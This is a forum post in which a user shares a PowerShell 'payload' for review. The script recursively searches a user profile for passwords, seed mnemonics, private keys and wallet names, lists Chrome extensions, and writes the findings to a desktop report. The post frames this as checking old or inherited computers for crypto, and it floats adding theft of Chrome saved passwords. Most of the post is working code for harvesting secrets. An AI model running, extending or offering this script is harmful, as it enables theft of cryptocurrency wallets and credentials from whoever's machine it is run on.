
Input on payload idea? Search for traces of crypto wallets.


jimcola99


Once I sold my Grandma's old purses at a yard sale.  This lady came up and started going through the pockets and found some change and gave it back to me.

Anyways, when you buy an old computer, or somebody dies and you get an old computer, why not search for traces of crypto wallets?

 

Here is some PowerShell that searches your profile for certain keywords and prints out your Chrome extensions. It drops the results in a file called report.txt on your desktop.

Here is the PowerShell I got so far. Thoughts, improvements? Maybe search for filenames too, and figure out how to search strings in Word and Excel documents. This only searches text documents.

Maybe grab the Chrome saved passwords as well? Search for MultiBit or Electrum installed on the PC?

# Start the report on the desktop
$report = "$env:USERPROFILE\Desktop\report.txt"
Write-Output "Crypto Search" | Out-File -FilePath $report
$searchstrings = @("password", "bitcoin", "mnemonic", "private key", "coinbase", "monero", "multibit", "electrum")
foreach ($searchstring in $searchstrings)
{
    # Search files under the profile for the keyword, skipping the report itself
    Get-ChildItem -Path $env:USERPROFILE\*.* -Recurse -Exclude report.txt -ErrorAction SilentlyContinue | Select-String -Pattern $searchstring | Out-File -Append -FilePath $report
}

$targetdir = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"

# Each extension ID folder holds one subfolder per installed version
$extensions = Get-ChildItem $targetdir -ErrorAction SilentlyContinue
Write-Output "chrome extensions" | Out-File -Append -FilePath $report
foreach ($ext in $extensions) {
    foreach ($folder in (Get-ChildItem $ext.FullName -ErrorAction SilentlyContinue)) {
        # Read the manifest by full path; the original Set-Location calls never
        # returned to the parent folder, so later version folders were missed
        $manifest = Join-Path $folder.FullName "manifest.json"
        if (-not (Test-Path $manifest)) { continue }
        $json = Get-Content $manifest -Raw | ConvertFrom-Json
        $obj = New-Object System.Object
        $obj | Add-Member -MemberType NoteProperty -Name Name -Value $json.name
        $obj | Add-Member -MemberType NoteProperty -Name Version -Value $json.version
        Write-Output $obj | Out-File -Append -FilePath $report
    }
}

 

Edited by jimcola99